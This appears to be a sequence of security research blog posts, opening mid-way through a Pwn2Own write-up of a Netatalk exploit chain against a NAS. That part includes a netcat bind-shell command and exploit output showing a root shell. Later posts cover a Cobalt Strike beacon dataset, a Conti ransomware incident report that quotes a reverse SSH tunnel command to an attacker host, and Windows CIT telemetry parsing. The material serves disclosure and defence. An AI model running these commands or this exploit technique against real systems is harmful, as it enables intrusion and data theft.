/**
 * Convert from Apple's ._ file to Netatalk
 *
 * Apple's AppleDouble may contain a FinderInfo entry longer then 32 bytes
 * containing packed xattrs. Netatalk can't deal with that, so we
 * simply discard the packed xattrs.
 *
 * As we call ad_open() which might result in a recursion, just to be sure
 * use static variable in_conversion to check for that.
 *
 * Returns -1 in case an error occured, 0 if no conversion was done, 1 otherwise
 **/
static int ad_convert_osx(const char *path, struct adouble *ad)
{
    EC_INIT;
    static bool in_conversion = false;
    char *map;
    int finderlen = ad_getentrylen(ad, ADEID_FINDERI);
    ssize_t origlen;

    if (in_conversion || finderlen == ADEDLEN_FINDERI)
        return 0;
    in_conversion = true;

    LOG(log_debug, logtype_ad, "Converting OS X AppleDouble %s, FinderInfo length: %d",
        fullpathname(path), finderlen);

    origlen = ad_getentryoff(ad, ADEID_RFORK) + ad_getentrylen(ad, ADEID_RFORK);

    map = mmap(NULL, origlen, PROT_READ | PROT_WRITE, MAP_SHARED, ad_reso_fileno(ad), 0);
    if (map == MAP_FAILED) {
        LOG(log_error, logtype_ad, "mmap AppleDouble: %s\n", strerror(errno));
        EC_FAIL;
    }

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

    ad_setentrylen(ad, ADEID_FINDERI, ADEDLEN_FINDERI);
    ad->ad_rlen = ad_getentrylen(ad, ADEID_RFORK);
    ad_setentryoff(ad, ADEID_RFORK, ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI);

    EC_ZERO_LOG( ftruncate(ad_reso_fileno(ad),
                           ad_getentryoff(ad, ADEID_RFORK)
                           + ad_getentrylen(ad, ADEID_RFORK)) );

    (void)ad_rebuild_adouble_header_osx(ad, map);
    munmap(map, origlen);

The ad_rebuild_adouble_header_osx() function is shown below. This function is responsible for writing back the content of the adouble structure into the mapped file region in the AppleDouble format so it is saved into the file on disk.

//netatalk-3.1.12/libatalk/adouble/ad_flush.c
/*!
 * Prepare adbuf buffer from struct adouble for writing on disk
 */
int ad_rebuild_adouble_header_osx(struct adouble *ad, char *adbuf)
{
    uint32_t       temp;
    uint16_t       nent;
    char           *buf;

    LOG(log_debug, logtype_ad, "ad_rebuild_adouble_header_osx");

    buf = &adbuf[0];

    temp = htonl( ad->ad_magic );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl( ad->ad_version );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    memcpy(buf, AD_FILLER_NETATALK, strlen(AD_FILLER_NETATALK));
    buf += sizeof( ad->ad_filler );

    nent = htons(ADEID_NUM_OSX);
    memcpy(buf, &nent, sizeof( nent ));
    buf += sizeof( nent );

    /* FinderInfo */
    temp = htonl(EID_DISK(ADEID_FINDERI));
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDOFF_FINDERI_OSX);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDLEN_FINDERI);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    memcpy(adbuf + ADEDOFF_FINDERI_OSX, ad_entry(ad, ADEID_FINDERI), ADEDLEN_FINDERI);

    /* rfork */
    temp = htonl( EID_DISK(ADEID_RFORK) );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDOFF_RFORK_OSX);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl( ad->ad_rlen);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    return AD_DATASZ_OSX;
}

But if we look at the memcpy() argument in the debugger, we notice that the source argument is actually referenced from the stack and out of bound:

memcpy(0x7f423de20032, 0x7fffa499bbba, 32)
(gdb) info proc mappings 
...
          Start Addr           End Addr       Size     Offset objfile
      0x7fffa4923000     0x7fffa4969000    0x46000        0x0 [stack]
      0x7fffa49f9000     0x7fffa49fc000     0x3000        0x0 [vvar]
      0x7fffa49fc000     0x7fffa49fe000     0x2000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]

If you look at the ad_header_read_osx() code previously mentioned, you’ll notice it is confirmed since there is a struct adouble adosx; local variable (hence stored on the stack) that is passed all the way to ad_rebuild_adouble_header_osx().

So what does it mean? Well, the memcpy() writes 32 bytes from a stack controlled offset into the memory mapped file region. This means we can make it write arbitrary memory back into the file on disk. Then we can read the fork file (stored in the AppleDouble file format) using SMB and we can leak that content back to us.

That’s nice, but is there any libc.so address stored on the stack since we want to call system() which resides in libc.so?

It turns out there is one such address since main() is called from __libc_start_main():

.text:0000000000023FB0 __libc_start_main proc near 
...
.text:0000000000024099                 call    rax             ; main()
.text:000000000002409B
.text:000000000002409B loc_2409B:                              ; CODE XREF: __libc_start_main+15A↓j
.text:000000000002409B                 mov     edi, eax
.text:000000000002409D                 call    __GI_exit

Wrapping up

By default on the Western Digital PR4100, we can read and write files both in AFP and SMB without requiring authentication, as long as we do it on the Public share.

We also know that an afpd child process is forked from the afpd parent process to handle every client connection. This means that every child process has the same randomisation for all already loaded libraries.

To trigger the vulnerability, we need that a mooncake regular file exists, as well as a careful crafted associated ._mooncake fork file in the same directory. Then we can call the "FPOpenFork" command over AFP on the mooncake file and it parses the ._mooncake fork file (stored in the AppleDouble file format). It ends up calling the ad_convert_osx() function which is responsible for converting the Apple’s AppleDouble file to a simplified version implemented in Netatalk.

So we first start by creating the mooncake file. We do it using AFP but we think we could have done it using SMB too. Then we want to trigger the vulnerability twice.

The first time, we craft the ._mooncake fork file to abuse the memcpy() in ad_rebuild_adouble_header_osx(). When triggering the vulnerability:

  • The ._mooncake original fork file is mapped in memory with mmap()
  • The memcpy() function writes the return address in __libc_start_main() into the mapped region
  • The munmap() function is called and that data is saved into the ._mooncake fork file on disk.
  • We can leak that data back to us by reading the ._mooncake fork file over SMB (as if it was a regular file)

This allows deducing the libc.so base address and computing the system() address.

The second time, we craft the ._mooncake fork file to abuse the memmove() in ad_convert_osx(). When triggering the vulnerability:

  • The ._mooncake original fork file is mapped in memory with mmap()
  • The memmove() function overwrites the ld.so .data section to corrupt the rtld_local._dl_rtld_lock_recursive function pointer with the system() address and the rtld_local._dl_load_lock data with the shell command to execute
  • The memcpy() function crashes due to an invalid access to an unmapped stack address
  • The exception handler registered in Netatalk calls into dl_open() which makes it call system() on our arbitrary shell command

We chose to preliminary drop a statically compiled netcat using SMB and execute it from the following path: /mnt/HD/HD_a2/Public/tools/netcat -nvlp 9999 -e /bin/sh.

Below is the exploit in action:

# ./mooncake.py -i 192.168.1.3
(12:26:23) [*] Triggering leak...
(12:26:27) [*] Connected to AFP server
(12:26:27) [*] Leaked libc return address: 0x7f45e23f809b
(12:26:27) [*] libc base: 0x7f45e23d4000
(12:26:27) [*] Triggering system() call...
(12:26:27) [*] Using system address: 0x7f45e24189c0
(12:26:27) [*] Connected to AFP server
(12:26:29) [*] Connection timeout detected :)
(12:26:30) [*] Spawning a shell. Type any command.
uname -a
Linux MyCloudPR4100 4.14.22 #1 SMP Mon Dec 21 02:16:13 UTC 2020 Build-32 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) euid=501(nobody) egid=1000(share) groups=1000(share)
pwd
/mnt/HD/HD_a2/Public/edg

Pwn2Own Note

Whilst using the exploit within the competition, the exploit failed on the first attempt during the leak phase. We guessed that this may have been a timing issue with the environment compared to our test environment. Therefore we modified the code to introduce a ‘sleep()’ before leaking to ensure that samba would return the data modified by vulnerable AFP code. Our second attempt got the leak working but failed when trying to connect over telnet, so we added another ‘sleep()’ before connecting over telnet to ensure that the ‘system()’ command was executed correctly. Luckily this worked and this shows that just adding more sleeps is enough to fix unreliable exploits and we were successful on our third and final attempt 🙂

Mining data from Cobalt Strike beacons

25 March 2022 at 16:18

Since we published about identifying Cobalt Strike Team Servers in the wild just over three years ago, we’ve collected over 128,000 beacons from over 24,000 active Team Servers. Today, RIFT is making this extensive beacon dataset publicly available in combination with the open-source release of dissect.cobaltstrike, our Python library for studying and parsing Cobalt Strike related data.

The published dataset contains historical beacon metadata ranging from 2018 to 2022. This blog will highlight some interesting findings you can extract and query from this extensive dataset. We encourage other researchers also to explore the dataset and share exciting results with the community.

Cobalt Strike Beacon dataset

The dataset beacons.jsonl.gz is a GZIP compressed file containing 128,340 rows of beacon metadata as JSON-lines. You can download it from the following repository and make sure to also check out the accompanying Jupyter notebook:

The dataset spans almost four years of historical Cobalt Strike beacon metadata from July 2018 until February 2022. Unfortunately, we lost five months’ worth of data in 2019 due to archiving issues. In addition, the dataset mainly focuses on x86 beacons collected from active Team Servers on HTTP port 80, 443 and DNS; therefore, it does not contain any beacons from other sources, such as VirusTotal.

The beacon payloads themselves are not in the dataset due to the size. Instead, the different beacon configuration settings are stored, including other metadata such as:

  • Date the beacon was collected and from which IP address and port
  • GeoIP + ASN metadata
  • TLS certificate in DER format
  • PE information (timestamps, magic_mz, magic_pe, stage_prepend, stage_append)
  • If the payload was XOR encoded, and which XOR key was used for config obfuscation
  • The raw beacon configuration bytes; handy if you want to parse the beacon config manually. (e.g. using dissect.cobaltstrike or another parser of choice)

While there are some trivial methods to identify cracked/pirated Cobalt Strike Team Servers from the beacon payload, it’s difficult to tell for the non-trivial ones. Therefore the dataset is unfiltered, full disclosure and contains all beacons we have collected.

Cobalt Strike Team Servers that are properly hidden or have payload staging disabled are, of course, not included. That means Red Teams (and sadly threat actors) with good OPSEC have nothing to worry about being present in this dataset. 🙂

Beacons, and where to find them

The Cobalt Strike beacons were acquired by first identifying Team Servers on the Internet and then downloading the beacon using a checksum8 HTTP request. This method is similar to how the company behind Cobalt Strike did their own Cobalt Strike Team Server Population Study back in 2019. 

Although the anomalous space fingerprint we used for identification was since fixed, we found other reliable methods for identifying Team Servers. In addition, we are sure that the original author of Cobalt Strike intentionally left some indicators in there to help blue teams. For that, we are grateful and hope this doesn’t change in the future.

Via our honeypots, we can tell that RIFT is not alone in mining beacons. Everyone is doing it now. The increased blog posts and example scripts on how to find Cobalt Strike probably attribute to this, next to the increased popularity of Cobalt Strike itself, of course.

The development of increased scanning for Cobalt Strike is fascinating to witness, including the different techniques and shotgun approaches for identifying Team Servers and retrieving beacons. Some even skip the identification part and go directly for the beacon request! As you can imagine, this can be noisy, which surely doesn’t go unnoticed for some threat actors.

If you run a public-facing web server, you can easily verify this increased scanning by checking the HTTP access logs for common checksum8 like requests, for example, by using the following grep command:

$ zgrep -hE "GET /[a-zA-Z0-9]{4} HTTP" /var/log/nginx/*.gz
172.x.x.x - - [23/Feb/2021:18:xx:08 +0100] "GET /0bef HTTP/1.0” 404 162 "-" "-"
172.x.x.x - - [24/Feb/2021:09:xx:40 +0100] "GET /0bef HTTP/1.0” 404 162 "-" "-"
139.x.x.x - - [25/Feb/2021:05:xx:39 +0100] "GET /bag2 HTTP/1.1” 404 193 "-" "-"
134.x.x.x - - [25/Feb/2021:15:xx:12 +0100] "GET /ab2g HTTP/1.1” 400 166 "-" "-"
134.x.x.x - - [25/Feb/2021:15:xx:22 +0100] "GET /ab2h HTTP/1.1” 400 166 "-" "-"

The requests shown above are checksum8 requests (for x86 and x64 beacons), hitting a normal webserver hosting a real website in February 2021.

You can also use our checksum8-accesslogs.py script, which does all these things in one script and more accurately by verifying the checksum8 value. It can also output statistics. Here is an example of outputting the x86 and x64 beacon HTTP requests hitting one of our honeypots and generating the statistics:

checksum8-accesslog.py script finds possible Beacon stager requests in access logs

In the output, you can also see the different beacon scanning techniques being used, which we will leave as an exercise for the reader to figure out.

We can see an apparent increase in beacon scanning on one of our honeypots by plotting the statistics:

So if you ever wondered why people are requesting these weird four-character URLs (or other strange-looking URLs) on your web server, check the checksum8 value of the request, and you might have your answer.

We try to be a bit stealthier and won’t disclose our fingerprinting techniques, as we also know threat actors are vigilant and, in the long run, will make it harder for everyone dealing with Threat Intelligence.

Cobalt Strike version usage over time

Because we have beacon metadata over multiple years, we can paint a pretty good picture of active Cobalt Strike servers on the Internet and which versions they were using at that time.

To extract the Cobalt Strike version data, we used the following two methods:

  • Using the Beacon Setting constants
    • When a new Cobalt Strike beacon configuration setting is introduced, the Setting constant is increased and then assigned. It’s possible to deduce the version based on the highest available constant in the extracted beacon configuration.
  • Using the PE export timestamp

Our Python library dissect.cobaltstrike supports both methods for deducing version numbers and favours the PE export timestamp when available.

The dataset already contains the beacon_version field for your convenience and is based on the PE export timestamp. Using this field, we can generate the following graph showing the different Cobalt Strike versions used on the Internet over time:

We can see that in April 2021, there was quite a prominent peak of online Cobalt Strike servers and unique beacons, but we are not sure what caused this except that there was a 3% increase of modified (likely malicious) beacons that month.

The following percentage-wise graph shows a clearer picture of the adoption and popularity between the different versions over time:

We can see that Cobalt Strike 4.0 (released in December 2019) remained quite popular from January 2020 to January 2021.

Beacon watermark statistics

Since Cobalt Strike 3.10 (released December 2017), the beacons contain a setting called SETTING_WATERMARK. This watermark value should be unique per Cobalt Strike installation, as the license server issues this.

However, cracked/pirated versions usually patch this to a fixed value, making it easy to identify which beacons are more likely to be malicious (i.e. not a penetration tester). This likelihood aligns with our incident response engagements so far, where beacons related to the compromise used known-bad watermarks.

Note that requesting a trial or buying a legitimate copy of Cobalt Strike is difficult for malicious actors as every user is vetted and screened. Because of these measures, there is a high asking price for a Cobalt Strike copy on the dark web. For example, Conti invested $60.000 to acquire a valid copy of Cobalt Strike.

If you find a beacon with a watermark in this top 50, then it’s most likely malicious!

Customized Beacons

While parsing collected beacons, we found that some were modified, for example, with a custom shellcode stub, non-default XOR keys or reassigned Beacon settings.

Therefore, the beacons with heavy customizations could not be dumped properly and are not included in the dataset.

The configuration block in the beacon payload is usually obfuscated using a single byte XOR key. Depending on the Cobalt Strike version, the default keys are 0x2e or 0x69.

The use of non-default XOR keys requires the user to modify the beacon and or Team Server, as it’s not configurable by default. Here is an overview of seen XOR keys over the unique beacon dataset:

Using a custom XOR key makes you an outlier though, but it does protect you against some existing Cobalt Strike config dumpers. Our Python library dissect.cobaltstrike supports trying all XOR keys when the default XOR keys don’t work. For example, you can pass the command line flag --all-xor-keys to the beacon-dump command.

Portable Executable artifacts

While most existing Cobalt Strike dumpers focus on the beacon settings, some settings from the Malleable C2 profiles will not end up in the embedded beacon config of the payload. For example, some Portable Executable (PE) settings in the Malleable C2 profile are applied directly to the beacon payload. Our Python library dissect.cobaltstrike supports extracting this information, and our dataset includes the following extracted PE header metadata:

  • magic_mz — MZ header
  • magic_pe — PE header
  • pe_compile_stamp — PE compilation stamp
  • pe_export_stamp — timestamp of the export section
  • stage_prepend – (shellcode) bytes prepended to the start of the beacon payload
  • stage_append — bytes appended to the end of the beacon payload

We created an overview of the most common stage_prepend bytes that are all ASCII bytes. These bytes are prepended in front of the MZ header, and has to be valid assembly code but resulting in a no-operation as it’s executed as shellcode. Some are quite creative:

If we disassemble the example stage_prepend shellcode JFIFJFIF we can see that it increases the ESI and decreases the EDX registers and leaves it modified as a result; so it’s not fully a no-operation shellcode but it most likely doesn’t affect the staging process either.

$ echo -n JFIFJFIF | ndisasm -b 32 /dev/stdin
00000000  4A                dec edx
00000001  46                inc esi
00000002  49                dec ecx
00000003  46                inc esi
00000004  4A                dec edx
00000005  46                inc esi
00000006  49                dec ecx
00000007  46                inc esi

You can check our Jupyter notebook for an overview on the rest of the PE artifacts, such as magic_mz and magic_pe.

Watermarked releasenotes.txt using whitespace

The author of Cobalt Strike must really like spaces, after the erroneous space in the HTTP server header, there is now also a (repurposed) beacon setting called SETTING_SPAWNTO that is now populated with the MD5 hash of the file releasenotes.txt (or accidentally another file in the same directory if that matches the same checksum8 value of 152 and filename length!). 

The releasenotes.txt is automatically downloaded from the license server when you activate or update your Cobalt Strike server. To our surprise, we discovered that this file is most likely watermarked using whitespace characters thus making this file and MD5 hash unique per installation. The license server probably keeps track of all these uniquely generated files to help combat piracy and leaks of Cobalt Strike.

While this is pretty clever, we found that in some pirated beacons this field is all zeroes, or not available. Meaning they knew about this file and decided not to ship it in the pirated version or the field value was patched out. Nevertheless, this field is still useful for hunting or correlating beacons when it is available.

Note the subtle whitespace changes at the end of the lines between the two releasenotes.txt files. 

Analyze Beacon payloads with dissect.cobaltstrike

We are also proud to open-source our Python library for dissecting Cobalt Strike, aptly named dissect.cobaltstrike. The library is available on PyPI and requires Python 3.6 or higher. You can use pip to install it:

$ pip install dissect.cobaltstrike

The project’s GitHub repository: https://github.com/fox-it/dissect.cobaltstrike

It currently installs three command line tools for your convenience:

  • beacon-dump – used for dumping configuration from beacon payloads (also works on memory dumps)
  • beacon-xordecode – a standalone tool for decoding xorencoded payloads
  • c2profile-dump – use this to read and parse Malleable C2 profiles.

A neat feature of beacon-dump is to dump the beacon configuration back as it’s Malleable C2 profile compatible equivalent:

Dumping beacons settings as a Malleable C2 Profile

While these command line tools provide most of the boilerplate for working with Beacon payloads, you can also import the library in a script or notebook for more advanced use cases. See our notebook and documentation for some examples.

Closing thoughts

The beacon dataset has proved very useful to us, especially the historical aspect of the dataset is insightful during incident response engagements. We use the dataset daily, ranging from C2 infrastructure mapping, actor tracking, threat hunting, high-quality indicators, detection engineering and many more.

We hope this dataset and Python library will be helpful to the community as it is for us and are eager to see what kind of exciting things people will come up with or find using the data and tooling. What we have shown in this blog is only the tip of the iceberg of what you can uncover from beacon data.

Some ideas for the readers:

  • Cluster beacon and C2 profile features using a clustering algorithm such as DBSCAN.
  • Improve the classification of malicious beacons. You can find the current classification method in our notebook.
  • Use the GeoIP ASN data to determine where the most malicious beacons are hosted.
  • Analysis on the x509 certificate data, such as self-signed or not.
  • Determine if a beacon uses domain fronting and which CDN.

All the statistics shown in this blog post can also be found in our accompanying Jupyter notebook including some more statistics and overviews not shown in this blog.

We also want to thank Rapid7 for the Open Data sets, without this data the beacon dataset would be far less complete!

Final links for convenience:

Whitepaper – Double Fetch Vulnerabilities in C and C++

28 March 2022 at 13:00

Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes. As much of this information is spread across various sources, this whitepaper draws the knowledge together into a single place, in order to better describe the different types of the vulnerability, how each type occurs, and the appropriate fixes.

This whitepaper may be downloaded below:


[Editor’s note: This whitepaper was updated on March 29th 2022 to correct minor formatting issues with the prior version.]

Conti-nuation: methods and techniques observed in operations post the leaks

Authored by: Nikolaos Pantazopoulos, Alex Jessop and Simon Biggs

Executive Summary

In February 2022, a Twitter account which uses the handle ‘ContiLeaks’, started to publicly release information for the operations of the cybercrime group behind the Conti ransomware. The leaked data included private conversations between members along with source code of various panels and tools (e.g. Team9 backdoor panel [1]). Furthermore, even though the leaks appeared to have a focus on the people behind the Conti operations, the leaked data confirmed (at least to the public domain) that the Conti operators are part of the group, which operates under the ‘TheTrick’ ecosystem. For the past few months, there was a common misconception that Conti was a different entity.

Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware. This post describes the methods and techniques we observed during recent incidents that took place after the Conti data leaks.

Our findings can be summarised as below:

  • Multiple different initial access vectors have been observed.
  • The operator(s) use service accounts of the victim’s Antivirus product in order to laterally move through the estate and deploy the ransomware.
  • After getting access, the operator(s) attempted to remove the installed Antivirus product through the execution of batch scripts.
  • To achieve persistence in the compromised hosts, multiple techniques were observed;
    • Service created for the execution of Cobalt Strike.
    • Multiple legitimate remote access software, ‘AnyDesk’, ‘Splashtop’ and ‘Atera’, were deployed. (Note: This has been reported in the past too by different vendors)
      • Local admin account ‘Crackenn’ created. (Note: This has been previously reported by Truesec as a Conti behaviour [2])
  • Before starting the ransomware activity, the operators exfiltrated data from the network with the legitimate software ‘Rclone’ [3].

It should be noted that the threat actor(s) might use different tools or techniques in some stages of the compromise.

Initial Access

Multiple initial access vectors have been observed recently; phishing emails and the exploitation of Microsoft Exchange servers. The phishing email delivered to an employer proceeded to deploy Qakbot to the users Citrix session. The targeting of Microsoft Exchange saw ProxyShell and ProxyLogon vulnerabilities exploited. When this vector was observed, the compromise of the Exchange servers often took place two – three months prior to the post exploitation phase. This behaviour suggests that the team responsible for gaining initial access compromised a large number of estates in a small timeframe. 

With a number of engagements, it was not possible to ascertain the initial access due to dwell time and evidence retention. However, other initial access vectors utilised by the Conti operator(s) are:

  • Credential brute-force
  • Use of publicly available exploits. We have observed the following exploits being used:
    • Fortigate VPN
      • CVE-2018-13379
      • CVE-2018-13374
    • Log4Shell
      • CVE-2021-44228
  • Phishing e-mail sent by a legitimate compromised account.

Lateral Movement

In one incident, after gaining access to the first compromised host, we observed the threat actor carrying out the following actions:

  • Download AnyDesk from hxxps://37.221.113[.]100/anydesk.exe
  • Deployment of the following batch files:
    • 1.bat, 2.bat, 111.bat
      • Ransomware propagation
    • Removesophos.bat, uninstallSophos.bat
      • Uninstalls Sophos Antivirus solution
    • Aspx.bat
      • Contains a command-line, which executes the dropped executable file ‘ekern.exe’.
      • ‘ekern.exe’ is a command line connection tool known as Plink [4]
      • This file establishes a reverse SSH tunnel that allows direct RDP connection to the compromised host.
      • ekern.exe -ssh -P 53 -l redacted-pw redacted -R REDACTED_IP:59000:127.0.0.1:3389

After executing the above files, we observed the following utilities being used for reconnaissance and movement:

  • RDP
  • ADFind
  • Bloodhound to identify the network topology.
  • netscan.exe for network shares discovery.
  • Cobalt Strike deployed allowing the threat actor to laterally move throughout the network.

The common techniques across the multiple Conti engagements are the use of RDP and Cobalt Strike.

Persistence

The threat actor leveraged Windows services to add persistence for the Cobalt Strike beacon. The primary persistence method was a Windows service, an example can be observed below:

A service was installed in the system.

Service Name: REDACTED

Service File Name: cmd.exe /c C:\ProgramData\1.msi

Service Type: user mode service

Service Start Type: demand start

Service Account: LocalSystem

In addition, services were also installed to provide persistence for the Remote Access Tools deployed by the threat actor:

  • AnyDesk
  • Splashtop
  • Atera

Another Conti engagement saw no methods of persistence. However, a temporary service was created to execute Cobalt Strike. It is hypothesized that the threat actor planned to achieve their objective quickly and therefore used services for execution rather than persistence.

In a separate engagement, where the initial access vector was phishing and lead to the deployment of Qakbot, the threat actor proceeded to create a local admin account named ‘Crackenn’ for persistence on the host. 

Privilege Escalation

Conti operator(s) managed to escalate their privileges by compromising and using different accounts that were found in the compromised host. The credentials compromised in multiple engagements was achieved by deploying tools such as Mimikatz.

One operator was also observed exploiting ZeroLogon to obtain credentials and move laterally.

Exfiltration and Encryption

Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ was configured to upload to either Mega cloud storage provider or to a threat actor controlled server. Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.

As discussed earlier on, the average dwell time of a Conti compromise is heavily dependant on the initial access method. Those incidents that have involved ProxyShell and ProxyLogon, the time between initial access and lateral movement has been three – six months. However once lateral movement is conducted, time to completing their objective is a matter of days. 

Recommendations

  • Monitor firewalls for traffic categorised as filesharing
  • Monitor firewalls for anomalous spikes in data leaving the network
  • Patch externally facing services immediately
  • Monitor installed software for remote access tools
  • Restrict RDP and SMB access between hosts
  • Implement a Robust Password Policy [5]
  • Provide regular security awareness training

Indicators of Compromise

Indicator Value Indicator Type Description
37.221.113[.]100/anydesk.exe IP Address Hosts AnyDesk
103.253.208[.]79 IP Address Cobalt Strike command-and-control server
C:\ProgramData\1.msi Filename Cobalt Strike payload
C:\ProgramData\1.dll Filename Cobalt Strike payload
223.29.205[.]54 IP Address AnyDesk IP address of the operator.
C:\Windows\sv.exe Filename Rclone
C:\Windows\svchost.conf Filename Rclone config
E03AF25994222D4DC6EFD98AE65217A03A5B40EEDCFFAC45F098E2A6F68F3F41 SHA256 Sv.exe – Rclone
C:\Users\Public\Report_18.xls Filename Cobalt Strike payload
C:\Users\Public\x86_16.dll Filename Cobalt Strike payload
Crackenn Account Local admin account created on patient zero
C:\Users\<user>\AppData\Roaming\Microsoft\Abevi\<random characters>.dll Filename Qakbot payload
C:\Users\Public\AdFind.exe Filename ADFind
23.82.140[.]234 IP Address Cobalt Strike command-and-control server
23.81.246[.]179 IP Address Cobalt Strike command-and-control server
hijelurusa[.]com Domain Cobalt Strike command-and-control server

References

  1. https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/
  2. https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks
  3. https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
  4. https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html
  5. https://www.ncsc.gov.uk/collection/passwords/updating-your-approach

Public Report – Google Enterprise API Security Assessment

7 April 2022 at 20:06

During the autumn of 2021, Google engaged NCC Group to perform a review of the Android 12 Enterprise API to evaluate its compliance with the Security Technical Implementation Guides (STIG) matrix provided by Google.

This assessment was also performed with reference to the Common Criteria Protection Profile for Mobile Device Fundamentals (PPMDF), from which the STIG was derived.

Due to the limited nature of the testing, certain elements of the STIG requirements are expected to be covered separately either via FIPS 140-2 or Common Criteria Evaluation.

The Public Report for this review may be downloaded below:

A brief look at Windows telemetry: CIT aka Customer Interaction Tracker

12 April 2022 at 14:06

tl;dr

  • Windows version up to at least version 7 contained a telemetry source called Customer Interaction Tracker
  • The CIT database can be parsed to aid forensic investigation
  • Finally, we also provide code to parse the CIT database yourself. We have implemented all of these findings into our previously mentioned investigation framework, which enables us to use them on all types of evidence data that we encounter.

Introduction

About 2 years ago while I was working on a large compromise assessment, I had extra time available to do a little research. For a compromise assessment, we take a forensic snapshot of everything that is in scope. This includes various log or SIEM sources, but also includes a lot of host data. This host data can vary from full disk images, such as those from virtual machines, to smaller, forensically acquired, evidence packages. During this particular compromise assessment, we had host data from about 10,000 machines. An excellent opportunity for large scale data analysis, but also a huge set of data to test new parsers on, or find less common edge cases for existing parsers! During these assignments we generally also take some time to look for new and interesting pieces of data to analyse. We don’t often have access to such a large and varied dataset, so we take advantage of it while we can.

Around this time I also happened to stumble upon the excellent blog posts from Maxim Suhanov over at dfir.ru. Something that caught my eye was his post about the CIT database in Windows. It may or may not stand for “Customer Interaction Tracker” and is one of the telemetry systems that exist within Windows, responsible for tracking interaction with the system and applications. I’d never heard of it before, and it seemed relatively unknown as his post was just about the only reference I could find about it. This, of course, piqued my interest, as it’s more fun exploring new and unknown data sources in contrast to well documented sources. And since I now had access to about 10k hosts, it seemed like as good a time as any to see if I could expore a little bit further than he had.

While Maxim does hypothesise about the purpose of the CIT database, he doesn’t describe much about how it is structured. It’s an LZNT1 compressed blob stored in the Windows registry at HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System that, when decompressed, has some executable paths in there. Nothing seems to be known about how to parse this binary blob. So called “grep forensics”, while having its’ place, doesn’t scale, and you might be missing crucial pieces of information from the unparsed data. I’m also someone who takes comfort in knowing exactly how something is structured, without too many hypotheses and guesses.

In my large dataset I had plenty of CIT databases, so I could compare them and possibly spot patterns on how to parse this blob, so that’s exactly what I set out to do. Fast iteration with dissect.cstruct and a few hours of eyeballing hexdumps later, I came up with some structures on how I thought the data might be stored.

struct header {
uint16 unk0;
uint16 unk1;
uint32 size;
uint64 timestamp;
uint64 unk2;
uint32 num_entry1;
uint32 entry1_offset;
uint32 block1_size;
uint32 block1_offset;
uint32 num_entry2;
uint32 entry2_offset;
uint64 timestamp2;
uint64 timestamp3;
uint32 unk9;
uint32 unk10;
uint32 unk11;
uint32 unk12;
uint32 unk13;
uint32 unk14;
};
// <snip>
struct entry1 {
uint32 entry3_offset;
uint32 entry2_offset;
uint32 entry3_size;
uint32 entry2_size;
};
// <snip>
struct entry3 {
uint32 path_offset;
uint32 unk0;
uint32 unk1;
uint32 unk2;
uint32 unk3;
uint32 unk4;
uint32 unk5;
};
view raw CITDB.h hosted with ❤ by GitHub

While still incredibly rough, I figured I had a rudimentary understanding of how the CIT was stored. However, at the time it was hardly a practical improvement over just “extracting the strings”, except perhaps that the parsing was a bit more efficient when compared to extracting strings. It did scratch initial my itch on figuring out how it might be stored, but I didn’t want to spend a lot more time on it at the time. I added it as a plugin in our investigation framework called dissect, ran it over all the host data we had and used it as an additional source of information during the remainder of the compromise assessment. I figured I’d revisit some other time.

Revisiting

Some other time turned out to be a lot farther into the future than I had anticipated. On an uneventful friday afternoon a few weeks ago, at the time of writing, and 2 years after my initial look, I figured I’d give the CIT another shot. This time I’d go about it with my usual approach, given that I had more time available now. That approach roughly consists of finding whatever DLL, driver or part of the Windows kernel is responsible for some behaviour, reverse engineering it and writing my own implementation. This is my preferred approach if I have a bit more time available, since it leaves little room for wrongful hypotheses and own interpretation, and grounds your implementation in mostly facts.

Approach

My usual approach starts with scraping the disk of one of my virtual machines with some byte pattern, usually a string in various encodings (UTF-8 and UTF-16-LE, the default string encoding in Windows, for example) in search of files that contain those strings or byte patterns. For this we can utilize our dissect framework that, among its many capabilities, allows us to easily search for occurrences of data within any data container, such as (sparse) VMDK files or other types of disk images. We can combine this with a filesystem parser to see if a hit is within the dataruns of a file, and report which files have hits. This process only takes a few minutes and I immediately get an overview of all the files on my entire filesystem that may have a reference to something I’m looking for.

In this case, I used part of the registry path where the CIT database is stored. Using this approach, I quickly found a couple of DLLs that looked interesting, but a quick inspection revealed only one that was truly of interest: generaltel.dll. This DLL, among other things, seems to be responsible for consuming the CIT database and its records, and emitting telemetry ETW messages.

Reverse engineering

Through reverse engineering the parsing code and looking at how the ETW messages are constructed, we can create some fairly complete looking structures to parse the CIT database.

typedef struct _CIT_HEADER {
WORD MajorVersion;
WORD MinorVersion;
DWORD Size; /* Size of the entire buffer */
FILETIME CurrentTimeLocal; /* Maybe the time when the saved CIT was last updated? */
